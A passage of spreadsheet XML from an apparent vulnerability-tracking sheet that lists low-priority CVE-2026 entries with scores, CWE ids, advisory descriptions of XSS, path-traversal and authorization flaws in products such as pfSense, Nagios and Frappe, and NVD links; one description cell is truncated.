          <t>OpenEMR before 8.3.0 contains a stored cross-site scripting vulnerability in the patient portal template import handler that allows authenticated attackers with Forms Administration permissions to upload template files containing arbitrary HTML or JavaScript. Attackers can inject malicious scripts through the template upload functionality, which are stored without sanitization and execute in the browser of any other Forms Administration user who views the template in the HTML editor.</t>
        </is>
      </c>
      <c r="M5339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40508</t>
        </is>
      </c>
    </row>
    <row r="5340">
      <c r="A5340" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46714</t>
        </is>
      </c>
      <c r="C5340" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5340" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5340" s="5" t="inlineStr"/>
      <c r="F5340" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5340" s="5" t="inlineStr"/>
      <c r="H5340" s="5" t="inlineStr"/>
      <c r="I5340" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J5340" s="5" t="inlineStr"/>
      <c r="K5340" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L5340" s="5" t="inlineStr">
        <is>
          <t>Misskey is an open source, federated social media platform. IVersions 8.63.0 and later, but prior to 2026.5.4, contain a vulnerability that can cause the Misskey web client to slow down or crash when it applies a malformed theme. This issue has been fixed in version 2026.5.4.</t>
        </is>
      </c>
      <c r="M5340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46714</t>
        </is>
      </c>
    </row>
    <row r="5341">
      <c r="A5341" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47185</t>
        </is>
      </c>
      <c r="C5341" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5341" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5341" s="5" t="inlineStr"/>
      <c r="F5341" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5341" s="5" t="inlineStr"/>
      <c r="H5341" s="5" t="inlineStr"/>
      <c r="I5341" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5341" s="5" t="inlineStr"/>
      <c r="K5341" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-863</t>
        </is>
      </c>
      <c r="L5341" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. Prior to 16.18.0, the Workspace Save API accepts a controlled workspace identifier from any authenticated user without enforcing workspace ownership, allowing modification of another user's private workspace and persistent script injection. This issue is fixed in version 16.18.0.</t>
        </is>
      </c>
      <c r="M5341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47185</t>
        </is>
      </c>
    </row>
    <row r="5342">
      <c r="A5342" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48550</t>
        </is>
      </c>
      <c r="C5342" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5342" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5342" s="5" t="inlineStr"/>
      <c r="F5342" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5342" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5342" s="5" t="inlineStr"/>
      <c r="I5342" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5342" s="5" t="inlineStr"/>
      <c r="K5342" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5342" s="5" t="inlineStr">
        <is>
          <t>Nagios Core before 4.5.14 and Nagios XI before 2026R1.7 are vulnerable to reflected cross-site scripting in cmd.cgi via the NagFormId parameter. An unauthenticated remote attacker can craft a malicious link that, when followed by an authenticated user, executes arbitrary JavaScript in the victim's browser.</t>
        </is>
      </c>
      <c r="M5342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48550</t>
        </is>
      </c>
    </row>
    <row r="5343">
      <c r="A5343" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48552</t>
        </is>
      </c>
      <c r="C5343" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5343" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5343" s="5" t="inlineStr"/>
      <c r="F5343" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5343" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5343" s="5" t="inlineStr"/>
      <c r="I5343" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5343" s="5" t="inlineStr"/>
      <c r="K5343" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5343" s="5" t="inlineStr">
        <is>
          <t>Nagios Core before 4.5.14 and Nagios XI before 2026R1.7 are vulnerable to DOM-based cross-site scripting in jsonquery.js. Unencoded JSON string values reflected from stored fields are inserted into the DOM without sanitization, allowing attackers to run arbitrary JavaScript in the victim's browser.</t>
        </is>
      </c>
      <c r="M5343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48552</t>
        </is>
      </c>
    </row>
    <row r="5344">
      <c r="A5344" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49391</t>
        </is>
      </c>
      <c r="C5344" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5344" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5344" s="5" t="inlineStr"/>
      <c r="F5344" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5344" s="5" t="inlineStr"/>
      <c r="H5344" s="5" t="inlineStr"/>
      <c r="I5344" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5344" s="5" t="inlineStr"/>
      <c r="K5344" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5344" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. Prior to 16.19.0 and 15.109.0, Data Import does not escape imported column headers before rendering previews and results, allowing an authenticated importer to persist script content that executes when another user views the import interface. This issue is fixed in versions 16.19.0 and 15.109.0.</t>
        </is>
      </c>
      <c r="M5344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49391</t>
        </is>
      </c>
    </row>
    <row r="5345">
      <c r="A5345" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52886</t>
        </is>
      </c>
      <c r="C5345" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5345" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5345" s="5" t="inlineStr"/>
      <c r="F5345" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5345" s="5" t="inlineStr"/>
      <c r="H5345" s="5" t="inlineStr"/>
      <c r="I5345" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J5345" s="5" t="inlineStr"/>
      <c r="K5345" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5345" s="5" t="inlineStr">
        <is>
          <t>Notepad++ is a free and open-source source code editor. Prior to 8.9.7, Notepad++ validates the backupFilePath attribute from session.xml with std::wstring::starts_with against the expected backup directory without path normalization, allowing parent-directory sequences during snapshot-mode restoration to read an arbitrary user-readable file outside the backup directory into an editor tab. This issue is fixed in version 8.9.7.</t>
        </is>
      </c>
      <c r="M5345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52886</t>
        </is>
      </c>
    </row>
    <row r="5346">
      <c r="A5346" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53457</t>
        </is>
      </c>
      <c r="C5346" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5346" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5346" s="5" t="inlineStr"/>
      <c r="F5346" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G5346" s="5" t="inlineStr"/>
      <c r="H5346" s="5" t="inlineStr"/>
      <c r="I5346" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5346" s="5" t="inlineStr"/>
      <c r="K5346" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5346" s="5" t="inlineStr">
        <is>
          <t>Blueprint Studio is a VS Code-like file editor for Home Assistant configuration files. Prior to 2.5.2, the legacy stateless terminal command execution path in custom_components/blueprint_studio/backend/terminal_manager.py accepted a cwd working-directory parameter and checked only whether the directory existed, without requiring it to remain inside the Home Assistant configuration directory. An administrator using the restricted terminal helper could select an existing directory outside the intended configuration boundary. Commands could then access or modify host paths permitted by the Home Assistant container and filesystem permissions, weakening the helper's expected filesystem restriction. This issue is fixed in version 2.5.2.</t>
        </is>
      </c>
      <c r="M5346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53457</t>
        </is>
      </c>
    </row>
    <row r="5347">
      <c r="A5347" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53720</t>
        </is>
      </c>
      <c r="C5347" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5347" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5347" s="5" t="inlineStr"/>
      <c r="F5347" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5347" s="5" t="inlineStr"/>
      <c r="H5347" s="5" t="inlineStr"/>
      <c r="I5347" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5347" s="5" t="inlineStr"/>
      <c r="K5347" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-1284, CWE-787</t>
        </is>
      </c>
      <c r="L5347" s="5" t="inlineStr">
        <is>
          <t>pymonocypher uses cython to wrap the Monocypher C library. Prior to version 4.0.2.8, the argon2i_32 implementation does not check the nb_blocks size. If the caller does not provide a sufficiently large buffer based on the API contract, then argon2i_32 will write past the end of the buffer and possibly corrupt the heap. This issue has been patched in version 4.0.2.8.</t>
        </is>
      </c>
      <c r="M5347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53720</t>
        </is>
      </c>
    </row>
    <row r="5348">
      <c r="A5348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54742</t>
        </is>
      </c>
      <c r="C5348" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5348" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5348" s="5" t="inlineStr"/>
      <c r="F5348" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5348" s="5" t="inlineStr"/>
      <c r="H5348" s="5" t="inlineStr"/>
      <c r="I5348" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5348" s="5" t="inlineStr"/>
      <c r="K5348" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5348" s="5" t="inlineStr">
        <is>
          <t>Lemmy is a link aggregator and forum for the fediverse. From 0.19.18 until 0.19.19 and 1.0.0-alpha.20, a community moderator can feature or unfeature posts in other communities through federated CollectionAdd and CollectionRemove activities using CollectionType::Featured. After verify_mod_action authorizes the actor against self.community(), the receive handlers in crates/apub/activities/src/community/collection_add.rs and crates/apub/activities/src/community/collection_remove.rs dereference self.object as an ApubPost and update featured_community without verifying that post.community_id equals community.id. A moderator can therefore target an unrelated post owned by another community, push it into featured feeds and listings, or undo another community's legitimate curation decision. This issue is fixed in versions 0.19.19 and 1.0.0-alpha.20.</t>
        </is>
      </c>
      <c r="M5348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54742</t>
        </is>
      </c>
    </row>
    <row r="5349">
      <c r="A5349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56126</t>
        </is>
      </c>
      <c r="C5349" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5349" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5349" s="5" t="inlineStr"/>
      <c r="F5349" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5349" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5349" s="5" t="inlineStr"/>
      <c r="I5349" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5349" s="5" t="inlineStr"/>
      <c r="K5349" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5349" s="5" t="inlineStr">
        <is>
          <t>pfSense Plus before 26.07 and CE before 2.9.0 allow authenticated users with the Status: Monitoring privilege to inject arbitrary JavaScript via graph configuration parameters in /status_monitoring.php. Multiple POST parameters including graph-left, graph-right, time-period, resolution, start-date, end-date, start-time, end-time, graph-type, invert, and refresh-interval are concatenated and written to the global pfSense XML configuration without sanitization, then echoed unsanitized into a JavaScript string context on page render. Because the setting is stored in the global configuration, the payload executes in the browser of every user who visits the Status: Monitoring page.</t>
        </is>
      </c>
      <c r="M5349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56126</t>
        </is>
      </c>
    </row>
    <row r="5350">
      <c r="A5350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56127</t>
        </is>
      </c>
      <c r="C5350" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5350" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5350" s="5" t="inlineStr"/>
      <c r="F5350" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5350" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5350" s="5" t="inlineStr"/>
      <c r="I5350" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5350" s="5" t="inlineStr"/>
      <c r="K5350" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5350" s="5" t="inlineStr">
        <is>
          <t>pfSense Plus before 26.07 and CE before 2.9.0 allow authenticated users with the Firewall: Rules: Edit privilege to inject arbitrary JavaScript via the descr parameter in /firewall_rules_edit.php. The firewall rule description is stored in the pfSense XML configuration with only backslash-escaping applied and no HTML sanitization, then rendered without encoding in the firewall log table in /status_logs_filter.php. The payload executes in the browser of any user with the Status: Logs: Firewall privilege who views the affected log entries.</t>
        </is>
      </c>
      <c r="M5350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56127</t>
        </is>
      </c>
    </row>
    <row r="5351">
      <c r="A5351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56128</t>
        </is>
      </c>
      <c r="C5351" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5351" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5351" s="5" t="inlineStr"/>
      <c r="F5351" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5351" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5351" s="5" t="inlineStr"/>
      <c r="I5351" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5351" s="5" t="inlineStr"/>
      <c r="K5351" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5351" s="5" t="inlineStr">
        <is>
          <t>pfSense Plus before 26.07 and CE before 2.9.0 allow authenticated users with the Firewall: Schedules: Edit privilege to inject arbitrary JavaScript via the descr parameter in /firewall_schedule_edit.php. The schedule description is stored without HTML sanitization and subsequently inserted into an HTML attribute value in /firewall_rules.php with only single-quote escaping applied, permitting double-quote breakout. The payload executes in the browser of any user with the Firewall: Rules privilege who views the rules list with the affected schedule attached.</t>
        </is>
      </c>
      <c r="M5351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56128</t>
        </is>
      </c>
    </row>
    <row r="5352">
      <c r="A5352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63105</t>
        </is>
      </c>
      <c r="C5352" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5352" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5352" s="5" t="inlineStr"/>
      <c r="F5352" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5352" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5352" s="5" t="inlineStr"/>
      <c r="I5352" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J5352" s="5" t="inlineStr"/>
      <c r="K5352" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5352" s="5" t="inlineStr">
        <is>
          <t>ReadyEcommerce before 4.5.2 contains a stored cross-site scripting (XSS) vulnerability that allows authenticated customers to inject malicious HTML payloads through the chat and support ticket messaging systems by exploiting unsanitized rendering via the v-html directive in Messages.vue, RightChatSidebar.vue, SupportTicketMessages.vue, and SupportTicketDetails.vue. Attackers can submit crafted message content that executes arbitrary JavaScript in the browser of any shop owner or administrator who views the message, enabling session cookie theft and account takeover.</t>
        </is>
      </c>
      <c r="M5352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63105</t>
        </is>
      </c>
    </row>
    <row r="5353">
      <c r="A5353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63336</t>
        </is>
      </c>
      <c r="C5353" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5353" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5353" s="5" t="inlineStr"/>
      <c r="F5353" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5353" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5353" s="5" t="inlineStr"/>
      <c r="I5353" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5353" s="5" t="inlineStr"/>
      <c r="K5353" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L5353" s="5" t="inlineStr">
        <is>
          <t>The RabbitMQ Java client library allows Java and JVM-based applications to connect to and interact with RabbitMQ nodes. Prior to 5.33.0, com.rabbitmq.client.ConnectionFactory.useSslProtocol() and ConnectionFactory.useSslProtocol(String) configure com.rabbitmq.client.TrustEverythingTrustManager and leave hostname verification disabled, causing arbitrary server certificates, including self-signed certificates, to be accepted. A network attacker able to intercept a TLS connection can impersonate the RabbitMQ broker, read protected AMQP traffic, and modify traffic without certificate or hostname validation. The fix changes the production TLS helpers to use the JVM default trust store and enables hostname verification, while retaining an explicitly named development-only no-verification helper. This issue is fixed in version 5.33.0.</t>
        </is>
      </c>
      <c r="M5353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63336</t>
        </is>
      </c>
    </row>
    <row r="5354">
      <c r="A5354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64653</t>
        </is>
      </c>
      <c r="C5354" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5354" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5354" s="5" t="inlineStr"/>
      <c r="F5354" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5354" s="5" t="inlineStr"/>
      <c r="H5354" s="5" t="inlineStr"/>
      <c r="I5354" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5354" s="5" t="inlineStr"/>
      <c r="K5354" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5354" s="5" t="inlineStr">
        <is>
          <t>GitHub CLI (gh) is GitHub’s official command line tool. Prior to 2.97.0, some HTTP request URLs interpolate variable path components without percent encoding, allowing URL path metacharacters in attacker-controlled repository or resource values to make gh address a different API endpoint or resource than the user intended. This issue is fixed in version 2.97.0.</t>
        </is>
      </c>
      <c r="M5354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64653</t>
        </is>
      </c>
    </row>
    <row r="5355">
      <c r="A5355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67196</t>
        </is>
      </c>
      <c r="C5355" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5355" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5355" s="5" t="inlineStr"/>
      <c r="F5355" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5355" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5355" s="5" t="inlineStr"/>
      <c r="I5355" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J5355" s="5" t="inlineStr"/>
      <c r="K5355" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5355" s="5" t="inlineStr">
        <is>
          <t>Perspective 5.0.0 contains a cross-site scripting vulnerability in the built-in Debug plugin that allows attackers to inject arbitrary HTML and JavaScript by writing table cell values containing unescaped HTML markup, which are interpolated directly into innerHTML during CSV serialization rendering. Attackers can craft table rows with payloads such as unquoted attribute injections containing event handler attributes that bypass RFC 4180 quoting, since angle brackets and event handler attributes are never escaped before assignment, causing malicious scripts to execute in the embedding page's origin.</t>
        </is>
      </c>
      <c r="M5355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67196</t>
        </is>
      </c>
    </row>
    <row r="5356">
      <c r="A5356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67333</t>
        </is>
      </c>
      <c r="C5356" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5356" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5356" s="5" t="inlineStr"/>
      <c r="F5356" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5356" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5356" s="5" t="inlineStr"/>
      <c r="I5356" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J5356" s="5" t="inlineStr"/>
      <c r="K5356" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5356" s="5" t="inlineStr">
        <is>
          <t>better-auth before 1.6.13 (and pre-release builds 1.7.0-beta.0 through 1.7.0-beta.3) fail to validate the scheme of redirect_uris registered via the deprecated oidc-provider plugin and the mcp plugin (which wraps the same provider). An attacker can register an OAuth client with a javascript: redirect_uri, which the authorization server later returns unchanged in the consent response. If the deployment's consent page navigates the browser to the returned redirectURI (e.g. assigning it to window.location.href), the attacker's JavaScript executes in the authorization-server origin, exposing the victim's session and enabling account takeover.</t>
        </is>
      </c>
      <c r="M5356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67333</t>
        </is>
      </c>
    </row>
    <row r="5357">
      <c r="A5357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67334</t>
        </is>
      </c>
      <c r="C5357" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5357" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5357" s="5" t="inlineStr"/>
      <c r="F5357" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5357" s="5" t="inlineStr"/>
      <c r="H5357" s="5" t="inlineStr"/>
      <c r="I5357" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J5357" s="5" t="inlineStr"/>
      <c r="K5357" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="L5357" s="5" t="inlineStr">
        <is>
          <t>better-auth versions before 1.6.11 fail to delete cached sessions when removing users via admin, anonymous, or SCIM endpoints when secondaryStorage is configured and storeSessionInDatabase is false. Attackers can reuse deleted user session tokens to maintain authentication for up to seven days after account deletion.</t>
        </is>
      </c>
      <c r="M5357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67334</t>
        </is>
      </c>
    </row>
    <row r="5358">
      <c r="A5358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67338</t>
        </is>
      </c>
      <c r="C5358" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5358" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5358" s="5" t="inlineStr"/>
      <c r="F5358" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5358" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5358" s="5" t="inlineStr"/>
      <c r="I5358" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J5358" s="5" t="inlineStr"/>
      <c r="K5358" s="5" t="inlineStr">
        <is>
          <t>CWE-84</t>
        </is>
      </c>
      <c r="L5358" s="5" t="inlineStr">
        <is>
          <t>JupyterLab before 4.5.9 contains a stored cross-site scripting vulnerability in the Extension Manager that fails to validate URI protocols in package metadata URLs. Attackers can publish malicious PyPI packages with javascript: URLs in project metadata that execute arbitrary JavaScript in the JupyterLab origin when users click the extension name.</t>
        </is>
      </c>
      <c r="M5358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67338</t>
        </is>
      </c>
    </row>
    <row r="5359">
      <c r="A5359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68583</t>
        </is>
      </c>
      <c r="C5359" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5359" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5359" s="5" t="inlineStr"/>
      <c r="F5359" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5359" s="5" t="inlineStr"/>
      <c r="H5359" s="5" t="inlineStr"/>
      <c r="I5359" s="5" t="inlineStr">
        <is>
          <t>2026-08-02</t>
        </is>
      </c>
      <c r="J5359" s="5" t="inlineStr"/>
      <c r="K5359" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5359" s="5" t="inlineStr">
        <is>
          <t>luci-app-a</t>
        </is>
      </c>
      <c r="M5359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68583</t>
        </is>
      </c>
    </row>
    <row r="5360">
      <c r="A5360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71498</t>
        </is>
      </c>
      <c r="C5360" s="5" t="n">
        <v>5.1</v>
      </c>
